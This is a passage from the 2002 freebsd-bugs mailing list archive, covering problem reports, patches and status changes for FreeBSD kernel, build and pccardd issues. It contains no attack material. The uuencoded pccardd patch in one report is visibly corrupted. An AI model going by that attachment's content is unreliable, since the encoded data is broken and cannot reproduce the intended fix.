<200206240701.g5O71H2O007749@ait0td02.aims.private> Date: Mon, 24 Jun 2002 17:01:17 +1000 (EST) From: Chris Knight Reply-To: Chris Knight To: FreeBSD-gnats-submit@freebsd.org Cc: chris@aims.com.au X-Send-Pr-Version: 3.113 Subject: kern/39762: ffs_softdep_stub.c has wrong function definitions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39762 >Category: kern >Synopsis: ffs_softdep_stub.c has wrong function definitions >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 00:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Chris Knight >Release: FreeBSD 5.0-CURRENT i386 >Organization: AIMS Independent Computer Professionals >Environment: System: FreeBSD ait0td02.aims.private 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Sun Jun 23 20:51:12 EST 2002 root@ait0td02.aims.private:/usr/obj/usr/src/sys/GENERIC i386 >Description: Building of BOOTMFS fails in ffs_softdep_stub.c due to differing function declarations of softdep_setup_directory_add and softdep_setup_directory_change. >How-To-Repeat: Try a release build of -current >Fix: Index: ffs_softdep_stub.c =================================================================== RCS file: /common/ncvs/src/sys/ufs/ffs/ffs_softdep_stub.c,v retrieving revision 1.22 diff -u -r1.22 ffs_softdep_stub.c --- ffs_softdep_stub.c 21 Jun 2002 06:18:03 -0000 1.22 +++ ffs_softdep_stub.c 24 Jun 2002 06:29:36 -0000 @@ -166,7 +166,7 @@ struct buf *bp; struct inode *dp; off_t diroffset; - long newinum; + ino_t newinum; struct buf *newdirbp; int isnewblk; { @@ -202,7 +202,7 @@ struct buf *bp; struct inode *dp; struct inode *ip; - long newinum; + ino_t newinum; int isrmdir; { >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 1:42:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4170C37BA12 for ; Mon, 24 Jun 2002 01:40:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O8e1P47078; Mon, 24 Jun 2002 01:40:01 -0700 (PDT) (envelope-from gnats) Received: from postoffice.aims.com.au (eth0.lnk.aims.com.au [203.31.73.253]) by hub.freebsd.org (Postfix) with ESMTP id 67C9437B4BE for ; Mon, 24 Jun 2002 00:21:00 -0700 (PDT) Received: from ait0td02.aims.private (ait0td02.aims.private [192.168.10.253]) by postoffice.aims.com.au with ESMTP id g5O6sgm40029 for ; Mon, 24 Jun 2002 16:54:42 +1000 (EST) (envelope-from chris@aims.com.au) Received: from ait0td02.aims.private (localhost [127.0.0.1]) by ait0td02.aims.private (8.12.4/8.12.4) with ESMTP id g5O6seDN007577 for ; Mon, 24 Jun 2002 16:54:40 +1000 (EST) (envelope-from chris@aims.com.au) Received: (from root@localhost) by ait0td02.aims.private (8.12.4/8.12.4/Submit) id g5O6seQk007576; Mon, 24 Jun 2002 16:54:40 +1000 (EST) Message-Id: <200206240654.g5O6seQk007576@ait0td02.aims.private> Date: Mon, 24 Jun 2002 16:54:40 +1000 (EST) From: Chris Knight Reply-To: Chris Knight To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/39764: Testing Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39764 >Category: kern >Synopsis: Testing >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 01:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Chris Knight >Release: FreeBSD 5.0-CURRENT i386 >Organization: AIMS Independent Computer Professionals >Environment: System: FreeBSD ait0td02.aims.private 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Sun Jun 23 20:51:12 EST 2002 root@ait0td02.aims.private:/usr/obj/usr/src/sys/GENERIC i386 >Description: >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 1:45:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E0EBA37BA1B for ; Mon, 24 Jun 2002 01:40:07 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O8e7c47092; Mon, 24 Jun 2002 01:40:07 -0700 (PDT) (envelope-from gnats) Received: from Www.HCRC.edu.tw (www.HCRC.edu.tw [163.28.64.11]) by hub.freebsd.org (Postfix) with ESMTP id 5311137B497 for ; Mon, 24 Jun 2002 00:18:40 -0700 (PDT) Received: from Terry.Dorm11.NCTU.edu.tw (root@Terry.Dorm11.NCTU.edu.tw [140.113.192.99]) by Www.HCRC.edu.tw (8.12.3/8.12.3) with ESMTP id g5O7Ic3a021029 for ; Mon, 24 Jun 2002 15:18:38 +0800 (CST) (envelope-from ijliao@Terry.Dorm11.NCTU.edu.tw) Received: from Terry.Dorm11.NCTU.edu.tw (ijliao@localhost [127.0.0.1]) by Terry.Dorm11.NCTU.edu.tw (8.12.3/8.12.3) with ESMTP id g5O7IfL2001178 for ; Mon, 24 Jun 2002 15:18:41 +0800 (CST) (envelope-from ijliao@Terry.Dorm11.NCTU.edu.tw) Received: (from ijliao@localhost) by Terry.Dorm11.NCTU.edu.tw (8.12.3/8.12.3/Submit) id g5O7IeCr001177; Mon, 24 Jun 2002 15:18:40 +0800 (CST) Message-Id: <200206240718.g5O7IeCr001177@Terry.Dorm11.NCTU.edu.tw> Date: Mon, 24 Jun 2002 15:18:40 +0800 (CST) From: Ying-Chieh Liao Reply-To: Ying-Chieh Liao To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/39765: bsd.incs.mk, INCDIR or INCSDIR ? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39765 >Category: misc >Synopsis: bsd.incs.mk, INCDIR or INCSDIR ? >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 01:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Ying-Chieh Liao >Release: FreeBSD 5.0-CURRENT i386 >Organization: NCTU CSIE >Environment: System: FreeBSD Terry.Dorm11.NCTU.edu.tw 5.0-CURRENT FreeBSD 5.0-CURRENT #13: Mon Jun 10 20:42:43 CST 2002 root@Terry.Dorm11.NCTU.edu.tw:/ad0/usr.obj/usr/src/sys/TERRY i386 >Description: ports/graphics/libmng uses bsd.lib.mk, which uses bsd.incs.mk if we use INCDIR to specify where to install include files stable will install them into /usr/local/include <- correct but current installs into /usr/include if we use INCSDIR , stable will install them into /usr/include but current installs into /usr/local/include <- correct >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 2: 0:32 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B0D537B41F for ; Mon, 24 Jun 2002 02:00:10 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O90Aa49469; Mon, 24 Jun 2002 02:00:10 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 02:00:10 -0700 (PDT) Message-Id: <200206240900.g5O90Aa49469@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Chris Knight" Subject: Re: kern/39764: Testing Reply-To: "Chris Knight" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39764; it has been noted by GNATS. From: "Chris Knight" To: Cc: Subject: Re: kern/39764: Testing Date: Mon, 24 Jun 2002 18:59:20 +1000 Apologies, SNAFU at my end :-( Please close this PR. Regards, Chris Knight To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 2: 1:22 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 83A3437B411 for ; Mon, 24 Jun 2002 02:00:07 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O907S49457; Mon, 24 Jun 2002 02:00:07 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 8528B37B404 for ; Mon, 24 Jun 2002 01:59:01 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5O7aShG074921 for ; Mon, 24 Jun 2002 00:36:28 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5O7aSSs074920; Mon, 24 Jun 2002 00:36:28 -0700 (PDT) Message-Id: <200206240736.g5O7aSSs074920@www.freebsd.org> Date: Mon, 24 Jun 2002 00:36:28 -0700 (PDT) From: KOIE Hidetaka To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39772: pccardd is slow to install a PCCARD. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39772 >Category: misc >Synopsis: pccardd is slow to install a PCCARD. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 02:00:07 PDT 2002 >Closed-Date: >Last-Modified: >Originator: KOIE Hidetaka >Release: FreeBSD-4.6 >Organization: surigiken >Environment: FreeBSD skipjack.koie.org 4.6-STABLE FreeBSD 4.6-STABLE #14: Sat Jun 22 01:07:12 JST 2002 koie@skipjack.koie.org:/usr/src/sys/compile/TP i386 >Description: pccardd is slow to install a PCCARD. >How-To-Repeat: Insert a PCCARD. >Fix: pccardd sleeps 10s every time. Make this time into tunable and put `settle 2000' in /etc/pccard.conf if you want. begin 644 diff-pccardd M9&EF9B`M<'4@=7-R+G-B:6XO<&-C87)D+W!C8V%R9&0O8V%R9&0N8R!U&ES="P@PH@ M"2)I;F-L=61E(BP)"2\J(#$T("HO"B`)(F9U;F-T:6]N(BP)"2\J(#$U("HO M"B`)(FQO9W-T7-;72`]('L*("-D969I;F4@2U=$ M7TE.0TQ51$4)"3$T"B`C9&5F:6YE($M71%]&54Y#5$E/3@D),34*("-D969I M;F4@2U=$7TQ/1U-44@D),38**R-I9B`Q("\J4T545$Q%*B\**R-D969I;F4@ M2U=$7U-%5%1,10D),3<**R-E;F1I9@H@"B`O*B!F;W(@:V5Y=V]R9"!C;VUP M871I8FEL:71Y('=I=&@@4$%/+W!L86EN($9R965"4T0@*B\*('-T871I8R!S M=')U8W0@>PI`0"`M,S@R+#8@*S,X."PQ-R!`0"!P87)S969I;&4H=F]I9"D* M(`D)"6EN8VP@/2!N97=S='(H;F5X=%]T;VLH*2D["B`)"0EF:6QE7VEN8VQU M9&4H:6YC;"D["B`)"0EB"!O9B!T:&4@2!!F4@ M+BXN"B`N1&P@:7)Q($%R(&ER<2UN=6UB97(@+BXN"BLN1&P@:6YC;'5D92!! MF5D+@HK+E!P"BM4:&4@;W!T:6]N86P**RY% M;2!S971T;&4**VME>7=OF5O9BAIPH@"0ES=VET8V@@*&-O=6YT*2!["@`` ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 2: 3:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 231AB37B486; Mon, 24 Jun 2002 02:03:05 -0700 (PDT) Received: (from maxim@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O935P50028; Mon, 24 Jun 2002 02:03:05 -0700 (PDT) (envelope-from maxim) Date: Mon, 24 Jun 2002 02:03:05 -0700 (PDT) From: Message-Id: <200206240903.g5O935P50028@freefall.freebsd.org> To: chris@aims.com.au, maxim@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/39764: Testing Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Testing State-Changed-From-To: open->closed State-Changed-By: maxim State-Changed-When: Mon Jun 24 02:02:35 PDT 2002 State-Changed-Why: Is not a PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=39764 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 3:16:32 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4D1B837B400; Mon, 24 Jun 2002 03:16:31 -0700 (PDT) Received: (from bde@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OAGVP65894; Mon, 24 Jun 2002 03:16:31 -0700 (PDT) (envelope-from bde) Date: Mon, 24 Jun 2002 03:16:31 -0700 (PDT) From: Message-Id: <200206241016.g5OAGVP65894@freefall.freebsd.org> To: steve@moshier.net, bde@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/39236: error in e_pow.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: error in e_pow.c State-Changed-From-To: open->closed State-Changed-By: bde State-Changed-When: Mon Jun 24 03:14:33 PDT 2002 State-Changed-Why: Patch applied in rev.1.9 (-current) and rev.1.6.2.1 (RELENG_4) of e_pow.c. Applied same patch to e_powf.c although it is just cosmetic there. Thanks. http://www.freebsd.org/cgi/query-pr.cgi?pr=39236 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 4:22:22 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F26E737B403; Mon, 24 Jun 2002 04:22:19 -0700 (PDT) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OBMJp80925; Mon, 24 Jun 2002 04:22:19 -0700 (PDT) (envelope-from dwmalone) Date: Mon, 24 Jun 2002 04:22:19 -0700 (PDT) From: Message-Id: <200206241122.g5OBMJp80925@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, dwmalone@FreeBSD.org Subject: Re: kern/39527: getcwd() and unreadable parent directory Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: getcwd() and unreadable parent directory Responsible-Changed-From-To: freebsd-bugs->dwmalone Responsible-Changed-By: dwmalone Responsible-Changed-When: Mon Jun 24 04:21:49 PDT 2002 Responsible-Changed-Why: I'm intesteted in having a more detailed look in the name cache fulshing stuff. http://www.freebsd.org/cgi/query-pr.cgi?pr=39527 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 4:33:55 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1D53937B400; Mon, 24 Jun 2002 04:33:52 -0700 (PDT) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OBXqK82206; Mon, 24 Jun 2002 04:33:52 -0700 (PDT) (envelope-from dwmalone) Date: Mon, 24 Jun 2002 04:33:52 -0700 (PDT) From: Message-Id: <200206241133.g5OBXqK82206@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, dwmalone@FreeBSD.org Subject: Re: bin/39741: usr.sbin/pw/pw_user.c:726: warning: int format, long int arg (arg 8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: usr.sbin/pw/pw_user.c:726: warning: int format, long int arg (arg 8) Responsible-Changed-From-To: freebsd-bugs->dwmalone Responsible-Changed-By: dwmalone Responsible-Changed-When: Mon Jun 24 04:33:26 PDT 2002 Responsible-Changed-Why: Fixed in -current. I'm taking the PR as a MFC reminder. http://www.freebsd.org/cgi/query-pr.cgi?pr=39741 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 5:40:50 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DAF2F37B41F for ; Mon, 24 Jun 2002 05:40:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OCe4m94389; Mon, 24 Jun 2002 05:40:04 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 05:40:04 -0700 (PDT) Message-Id: <200206241240.g5OCe4m94389@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Marc Olzheim Subject: Re: kern/39331: namei cache unreliable for __getcwd() Reply-To: Marc Olzheim Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39331; it has been noted by GNATS. From: Marc Olzheim To: Serge van den Boom Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: kern/39331: namei cache unreliable for __getcwd() Date: Mon, 24 Jun 2002 14:33:14 +0200 For this to work, don't forget the 'a-x' with the chmod command. Marc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 6:25:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 551CC37B406; Mon, 24 Jun 2002 06:25:24 -0700 (PDT) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ODPNl07115; Mon, 24 Jun 2002 06:25:23 -0700 (PDT) (envelope-from dwmalone) Date: Mon, 24 Jun 2002 06:25:23 -0700 (PDT) From: Message-Id: <200206241325.g5ODPNl07115@freefall.freebsd.org> To: pornin@bolet.org, dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/35321: standard include files do not comply to standards Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: standard include files do not comply to standards State-Changed-From-To: open->closed State-Changed-By: dwmalone State-Changed-When: Mon Jun 24 06:24:47 PDT 2002 State-Changed-Why: Duplicate of http://www.FreeBSD.org/cgi/query-pr.cgi?pr=35307 http://www.freebsd.org/cgi/query-pr.cgi?pr=35321 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 7:13:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EEED637B404; Mon, 24 Jun 2002 07:13:10 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OEDAh30766; Mon, 24 Jun 2002 07:13:10 -0700 (PDT) (envelope-from dwcjr) Date: Mon, 24 Jun 2002 07:13:10 -0700 (PDT) From: Message-Id: <200206241413.g5OEDAh30766@freefall.freebsd.org> To: dwcjr@FreeBSD.org, freebsd-bugs@FreeBSD.org, dwcjr@FreeBSD.org Subject: Re: misc/39422: samba-2.2.5.p1 is marked as broken: Requires a recent FreeBSD 5.0-CURRENT. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: samba-2.2.5.p1 is marked as broken: Requires a recent FreeBSD 5.0-CURRENT. Responsible-Changed-From-To: freebsd-bugs->dwcjr Responsible-Changed-By: dwcjr Responsible-Changed-When: Mon Jun 24 07:12:39 PDT 2002 Responsible-Changed-Why: Over to maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=39422 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 8:32:32 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3C08D37B494; Mon, 24 Jun 2002 08:30:55 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OFUsq51111; Mon, 24 Jun 2002 08:30:54 -0700 (PDT) (envelope-from robert) Date: Mon, 24 Jun 2002 08:30:54 -0700 (PDT) From: Message-Id: <200206241530.g5OFUsq51111@freefall.freebsd.org> To: gil@arlut.utexas.edu, robert@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/39549: maestro3 driver causes page fault in kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: maestro3 driver causes page fault in kernel State-Changed-From-To: open->patched State-Changed-By: robert State-Changed-When: Mon Jun 24 08:29:26 PDT 2002 State-Changed-Why: A fix was committed to -current. Thanks for issuing a problem report! http://www.freebsd.org/cgi/query-pr.cgi?pr=39549 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 8:40:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E4B7737B405 for ; Mon, 24 Jun 2002 08:40:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OFe1252206; Mon, 24 Jun 2002 08:40:01 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 5AB7337B400 for ; Mon, 24 Jun 2002 08:38:44 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5OFcihG085928 for ; Mon, 24 Jun 2002 08:38:44 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5OFci6O085927; Mon, 24 Jun 2002 08:38:44 -0700 (PDT) Message-Id: <200206241538.g5OFci6O085927@www.freebsd.org> Date: Mon, 24 Jun 2002 08:38:44 -0700 (PDT) From: Daniel Huang To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39787: T/TCP support Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39787 >Category: misc >Synopsis: T/TCP support >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 08:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Daniel Huang >Release: FreeBSD 4.5 >Organization: Qobra Systems Inc. >Environment: FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386 >Description: I tested the T/TCP by using the source code in on FreeBsd 4.5. The tcpdump result as below: 09:49:10.957632 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: SFP 3873691517:3873691817(300) win 65535 (DF) 09:49:10.957748 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: S 2495134045:2495134045(0) ack 3873691518 win 65535 09:49:10.957782 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: F 301:301(0) ack 1 win 65535 (DF) 09:49:10.957834 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: ack 1 win 65535 (DF) 09:49:11.950539 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: FP 1:301(300) ack 1 win 65535 (DF) 09:49:11.950578 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: ack 302 win 65535 (DF) 09:49:11.950750 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: FP 1:401(400) ack 302 win 65535 (DF) 09:49:11.950768 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: ack 402 win 65535 (DF) The client sent 300 bytes to server, and server reply 400 bytes to client. It seems that step 4 and 5 are wrong, but I don't know why. I set rfc1644 on(1) and rfc1323 off(0), why step 4 sends wrong ACK and step 5 resend the message to server. Furthermore, I couldn't get the normal T/TCP transaction result -- just 3 segments, for my test it's seem with the upper tcpdump. Could you please give me some advice? I appreciate. >How-To-Repeat: Simply use the example T/TCP client/server source code in P.17, P.18 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 8:42:54 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5566F37B401; Mon, 24 Jun 2002 08:42:52 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OFgpK52803; Mon, 24 Jun 2002 08:42:51 -0700 (PDT) (envelope-from robert) Date: Mon, 24 Jun 2002 08:42:51 -0700 (PDT) From: Message-Id: <200206241542.g5OFgpK52803@freefall.freebsd.org> To: ady@freebsd.ady.ro, robert@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/37156: New CT5880 audio chipset signature Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: New CT5880 audio chipset signature State-Changed-From-To: open->closed State-Changed-By: robert State-Changed-When: Mon Jun 24 08:41:47 PDT 2002 State-Changed-Why: Originator requests that this PR gets closed because the problem has been fixed. http://www.freebsd.org/cgi/query-pr.cgi?pr=37156 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 9: 3:32 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from prism.flugsvamp.com (66-191-112-47.mad.wi.charter.com [66.191.112.47]) by hub.freebsd.org (Postfix) with ESMTP id C7E4137B431 for ; Mon, 24 Jun 2002 09:03:23 -0700 (PDT) Received: (from jlemon@localhost) by prism.flugsvamp.com (8.11.6/8.11.6) id g5OG2f481877; Mon, 24 Jun 2002 11:02:41 -0500 (CDT) (envelope-from jlemon) Date: Mon, 24 Jun 2002 11:02:41 -0500 (CDT) From: Jonathan Lemon Message-Id: <200206241602.g5OG2f481877@prism.flugsvamp.com> To: dhuang@qobra.com, bugs@freebsd.org Subject: Re: misc/39787: T/TCP support X-Newsgroups: local.mail.freebsd-bugs In-Reply-To: Organization: Cc: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: 